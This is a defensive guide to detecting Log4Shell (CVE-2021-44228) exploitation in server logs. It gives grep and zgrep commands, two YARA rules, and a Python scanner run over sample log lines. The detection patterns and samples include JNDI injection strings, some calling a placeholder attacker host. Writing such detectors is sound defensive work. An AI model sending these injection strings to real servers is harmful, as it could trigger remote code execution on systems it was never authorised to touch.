# log4j RCE Exploitation Detection

You can use these commands and rules to search for exploitation attempts against the log4j RCE vulnerability CVE-2021-44228.

## Grep / Zgrep

This command searches for exploitation attempts in uncompressed files in the folder `/var/log` and all subfolders:

```bash
sudo egrep -i -r '\$\{jndi:(ldap[s]?|rmi)://[^\n]+' /var/log
```

This command searches for exploitation attempts in compressed files in the folder `/var/log` and all subfolders:

```bash
sudo find /var/log -name \*.gz -print0 | xargs -0 zgrep -E -i '\$\{jndi:(ldap[s]?|rmi)://[^\n]+'
```

## YARA

Preliminary YARA rules (work in progress):

```yara
rule EXPL_Log4j_CVE_2021_44228_Dec21_Soft {
   meta:
      description = "Detects indicators in server logs that indicate an exploitation attempt of CVE-2021-44228"
      author = "Florian Roth"
      reference = "https://twitter.com/h113sdx/status/1469010902183661568?s=20"
      date = "2021-12-10"
      score = 60
   strings:
      $x1 = "${jndi:ldap://"
      $x2 = "${jndi:rmi://"
      $x3 = "${jndi:ldaps://"
   condition:
      1 of them
}

rule EXPL_Log4j_CVE_2021_44228_Dec21_Hard {
   meta:
      description = "Detects indicators in server logs that indicate the exploitation of CVE-2021-44228"
      author = "Florian Roth"
      reference = "https://twitter.com/h113sdx/status/1469010902183661568?s=20"
      date = "2021-12-10"
      score = 80
   strings:
      $x1 = /\$\{jndi:(ldap|ldaps|rmi):\/\/[a-z-\.0-9]{3,42}:[0-9]{2,5}\/[a-zA-Z\.]{1,32}\}/
      $fp1 = "ldap://127.0.0.1"
      $fp2 = "ldaps://127.0.0.1"
      $fp3 = "rmi://127.0.0.1"
   condition:
      $x1 and not 1 of ($fp*)
}
```

## Credits

I got help and ideas from

- @matthias_kaiser
- [@daphiel](https://twitter.com/daphiel)
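As an added example (not part of the original rules), the following Python applies the same two detection tiers as the YARA rules above, including the loopback false-positive exclusion, to constructed log lines. It matches case-insensitively like the `-i` grep commands, which is an assumption on my part, since the YARA strings as written are case-sensitive.

```python
import re
from typing import List, Optional, Tuple

# Soft indicators: the literal strings of the "Soft" YARA rule (score 60).
SOFT_INDICATORS = ("${jndi:ldap://", "${jndi:rmi://", "${jndi:ldaps://")

# Hard indicator: the regex of the "Hard" YARA rule (score 80) in Python
# syntax; it requires scheme://host:port/path followed by a closing brace.
HARD_RE = re.compile(
    r"\$\{jndi:(ldap|ldaps|rmi)://[a-z0-9.\-]{3,42}:[0-9]{2,5}/[a-zA-Z.]{1,32}\}"
)

# Lookups against loopback are excluded from the hard rule ($fp1..$fp3).
FALSE_POSITIVES = ("ldap://127.0.0.1", "ldaps://127.0.0.1", "rmi://127.0.0.1")


def score_line(line: str) -> Tuple[int, Optional[str]]:
    """Return (score, indicator) for one log line; (0, None) if clean."""
    low = line.lower()  # case-insensitive, like the grep/zgrep commands
    hard = HARD_RE.search(low)
    if hard and not any(fp in low for fp in FALSE_POSITIVES):
        return 80, hard.group(0)
    for indicator in SOFT_INDICATORS:
        if indicator in low:
            return 60, indicator
    return 0, None


def scan(lines: List[str]) -> List[Tuple[int, int, str]]:
    """Return (line_number, score, indicator) for every line that fires."""
    hits = []
    for number, line in enumerate(lines, start=1):
        score, indicator = score_line(line)
        if score:
            hits.append((number, score, indicator))
    return hits


# Constructed sample log lines (not real traffic); attacker host is a placeholder.
SAMPLE_LOG = [
    '10.0.0.1 - - [10/Dec/2021:10:00:00 +0000] "GET / HTTP/1.1" 200 512',
    '10.0.0.2 - - [10/Dec/2021:10:00:01 +0000] "GET /?q=${jndi:ldap://attacker.example:1389/a} HTTP/1.1" 200 512',
    'User-Agent: ${JNDI:rmi://127.0.0.1:1099/obj}',
    'User-Agent: ${jndi:ldaps://attacker.example/x}',
]

if __name__ == "__main__":
    for number, score, indicator in scan(SAMPLE_LOG):
        print(f"line {number}: score {score} ({indicator})")
```

Line 2 scores 80 (full host:port/path form), line 3 only 60 because the loopback exclusion suppresses the hard rule, and line 4 scores 60 because it lacks a port.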